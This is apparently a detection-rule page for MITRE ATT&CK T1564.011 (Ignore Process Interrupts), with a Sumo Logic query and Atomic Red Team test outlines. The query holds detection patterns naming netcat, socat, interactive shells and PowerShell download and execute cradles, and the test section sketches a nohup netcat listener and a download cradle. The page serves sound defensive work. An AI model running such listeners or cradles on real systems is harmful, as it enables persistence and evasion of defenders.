T1564.011 Sumo Logic CSE · Sumo

Detect Ignore Process Interrupts in Sumo Logic CSE

Adversaries evade defensive mechanisms by launching processes immune to interrupt signals, preventing analyst-driven or system-triggered termination. The primary technique is nohup on Linux and macOS, which detaches a process from the controlling terminal and causes it to ignore SIGHUP—the hangup signal sent when a session ends or a terminal closes. Malware authors also call signal() or sigaction() directly to mask SIGINT, SIGTERM, SIGPIPE, SIGCHLD, and other control signals, as documented in BPFDoor (masks 7 signals) and BOLDMOVE (masks SIGCHLD, SIGHUP, SIGPIPE). On Windows, PowerShell's -ErrorAction SilentlyContinue or $ErrorActionPreference = 'SilentlyContinue' prevents script termination on errors, allowing malicious payloads to continue past failures that would otherwise halt execution. Real-world usage includes GoldMax Linux variant (nohup invocation for C2 persistence through SSH disconnection), UNC3886 (nohup /bin/support in /etc/init.d/localnet for semi-persistence across reboots), Sea Turtle running SnappyTCP via nohup, and OSX/Shlayer applying nohup to payload execution on macOS. Unlike Trap (T1546.005), this technique does not re-invoke the process after termination—it only prolongs the existing execution session through events that would otherwise end it.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1564 Hide Artifacts
Sub-technique
T1564.011 Ignore Process Interrupts
Canonical reference
https://attack.mitre.org/techniques/T1564/011/

Sumo Detection Query

Sumo Logic CSE (Sumo)
sql 
// T1564.011 - Ignore Process Interrupts: nohup + PowerShell Error Suppression
// Part 1: Linux/macOS nohup detection via auditd or syslog
(
  (_sourceCategory=linux/audit OR _sourceCategory=linux/syslog OR _sourceCategory=macos/syslog)
  (
    "nohup" OR "EXECVE"
  )
  // Exclude known-good cron/scheduler invocations
  NOT (process="cron" OR process="anacron" OR process="CRON" OR _raw matches /crond.+nohup/)
  | parse regex field=_raw "(?:a0|cmd|command|comm)=\"?(?P<exec_cmd>[^\"\s]+)" nodrop
  | parse regex field=_raw "nohup\s+(?P<nohup_target>\S+)(?P<nohup_args>.*)" nodrop
  | where exec_cmd = "nohup" OR nohup_target != ""
  | eval detection_type = "nohup_interrupt_ignore"
  | eval platform = "Linux/macOS"
  | eval temp_dir_payload = if(nohup_target matches "/tmp/.*" OR nohup_target matches "/var/tmp/.*" OR nohup_target matches "/dev/shm/.*", 1, 0)
  | eval suspicious_net_tool = if(nohup_target matches ".*(netcat|ncat|socat|\/bin\/nc).*", 1, 0)
  | eval interactive_shell = if(nohup_args matches ".*(\-i|bash\s\-i|sh\s\-i).*", 1, 0)
  | eval persistence_path = if(nohup_target matches ".*\/etc\/init\.d\/.*" OR nohup_target matches ".*\/etc\/rc\..*" OR nohup_target matches ".*\/etc\/cron.*", 1, 0)
  | eval background_exec = if(_raw matches ".*&\s*$", 1, 0)
  | eval suspicion_score = temp_dir_payload + suspicious_net_tool + interactive_shell + persistence_path + background_exec
  | fields _time, _sourceHost, exec_cmd, nohup_target, nohup_args, detection_type, platform, suspicion_score
)
// Part 2: Windows PowerShell error suppression with malicious indicators
| union
(
  (_sourceCategory=windows/sysmon OR _sourceCategory=windows/security)
  ("powershell.exe" OR "pwsh.exe")
  ("SilentlyContinue" OR "ErrorActionPreference" OR "-ErrorAction Ignore" OR "-EA Ignore")
  | parse regex field=_raw "(?i)(?:CommandLine|cmd)\s*=\s*\"?(?P<command_line>[^\"\n]+)" nodrop
  | parse regex field=_raw "(?i)(?:Image|process)\s*=\s*\"?(?P<process_image>[^\"\n]+)" nodrop
  | where process_image matches "(?i).*(powershell\.exe|pwsh\.exe)"
  | eval cmd_lower = toLowerCase(command_line)
  | eval has_download_cradle = if(cmd_lower matches ".*(invoke-webrequest|iwr\s|net\.webclient|downloadstring|downloadfile).*", 1, 0)
  | eval has_exec_cradle = if(cmd_lower matches ".*(invoke-expression|iex\(|iex\s|-encodedcommand|-enc\s).*", 1, 0)
  | eval has_persistence = if(cmd_lower matches ".*(schtasks|sc\s+create|reg\s+add|new-service).*", 1, 0)
  | eval has_defense_evasion = if(cmd_lower matches ".*(set-mppreference|add-mppreference|disablerealtimemonitoring).*", 1, 0)
  | eval has_network_util = if(cmd_lower matches ".*(certutil|start-bitstransfer|bitsadmin).*", 1, 0)
  | eval suspicion_score = has_download_cradle + has_exec_cradle + has_persistence + has_defense_evasion + has_network_util
  | where suspicion_score > 0
  | eval detection_type = "ps_error_suppression"
  | eval platform = "Windows"
  | eval nohup_target = ""
  | fields _time, _sourceHost, process_image as exec_cmd, command_line as nohup_args, nohup_target, detection_type, platform, suspicion_score
)
| where suspicion_score >= 0
| sort by _time desc
| fields _time, _sourceHost, exec_cmd, nohup_target, nohup_args, detection_type, platform, suspicion_score
high severity medium confidence

Detects T1564.011 Ignore Process Interrupts across Linux/macOS and Windows. On Linux/macOS, identifies nohup invocations via auditd and syslog with suspicion scoring based on payload location, network tools, interactive shells, and persistence paths. On Windows, identifies PowerShell error suppression flags combined with malicious behavioral indicators including download cradles, encoded command execution, persistence actions, and defense evasion.

Data Sources

Linux auditd (via Sumo Logic installed collector)Linux/macOS syslogWindows Sysmon (via Sumo Logic installed collector)Windows Security Event log

Required Tables

_sourceCategory=linux/audit_sourceCategory=linux/syslog_sourceCategory=macos/syslog_sourceCategory=windows/sysmon_sourceCategory=windows/security

False Positives & Tuning

  • System administrators and DevOps engineers using nohup to launch long-running background processes (database migrations, backups, build jobs) that must survive terminal disconnects
  • Legitimate monitoring agents and daemon startup scripts in /etc/init.d or /etc/rc.d that invoke nohup to ensure process resilience
  • Infrastructure automation tooling (Ansible, Chef, Puppet) using PowerShell with -ErrorAction SilentlyContinue when idempotently checking or creating system resources
Download portable Sigma rule (.yml)

Other platforms for T1564.011

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1nohup Background Execution with Network Listener

    Expected signal: Linux auditd EXECVE record: a0='nohup', a1='nc', a2='-lvp', a3='14444', a4='-s', a5='127.0.0.1'. A second EXECVE record for the nc process itself with ppid matching the nohup process. MDE DeviceProcessEvents: FileName='nohup' with child process FileName='nc' where InitiatingProcessFileName='nohup'. DeviceNetworkEvents: nc process creating a listening socket on port 14444.

  2. Test 2nohup Protecting Interpreter from Temp Directory

    Expected signal: Auditd EXECVE: a0='chmod', a1='+x', a2='/tmp/df00tech_test_payload.sh' followed by a0='nohup', a1='/tmp/df00tech_test_payload.sh'. MDE DeviceFileEvents: file creation at /tmp/df00tech_test_payload.sh. DeviceProcessEvents: FileName='nohup', ProcessCommandLine contains '/tmp/' (TempDirPayload indicator). A second DeviceProcessEvents record for bash/sh with InitiatingProcessFileName='nohup' and FolderPath='/tmp/'.

  3. Test 3Programmatic Signal Masking via Python

    Expected signal: Auditd EXECVE: a0='python3', a1='-c', a2 contains 'signal.SIG_IGN'. MDE DeviceProcessEvents: FileName='python3', ProcessCommandLine contains 'SIG_IGN' and 'signal'. /proc/<pid>/status SigIgn field will be non-zero (e.g., 0x0000000000003c06 with SIGHUP=1, SIGINT=2, SIGTERM=15, SIGPIPE=13 masked). Attempting `kill -SIGTERM <pid>` will have no effect; only `kill -9 <pid>` terminates the process.

  4. Test 4PowerShell Error Suppression with Download Cradle

    Expected signal: Sysmon Event ID 1: Process Create — Image=powershell.exe, CommandLine contains 'ErrorActionPreference' and 'SilentlyContinue' and 'Net.WebClient' and 'DownloadString' and 'Invoke-WebRequest'. Sysmon Event ID 3: Network Connection attempts to 127.0.0.1:19999 (will fail with connection refused). PowerShell ScriptBlock Log Event ID 4104 in Microsoft-Windows-PowerShell/Operational with full script content.

Last updated: 2026-04-21 Research depth: deep
References (11)

Unlock Pro Content

Get the full detection package for T1564.011 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1564Hide Artifacts

Related Sub-techniques

T1564.001Hidden Files and DirectoriesT1564.002Hidden UsersT1564.003Hidden WindowT1564.004NTFS File AttributesT1564.005Hidden File SystemT1564.006Run Virtual InstanceT1564.007VBA StompingT1564.008Email Hiding RulesT1564.009Resource ForkingT1564.010Process Argument SpoofingT1564.012File/Path ExclusionsT1564.013Bind MountsT1564.014Extended Attributes

Related Techniques

T1564Hide ArtifactsT1546.005TrapT1059.004Unix ShellT1059.006PythonT1071.001Web ProtocolsT1543.002Systemd ServiceT1037.004RC ScriptsT1105Ingress Tool TransferT1036.005Match Legitimate Resource Name or Location

Same Tactic: Defense Evasion

Popular Detections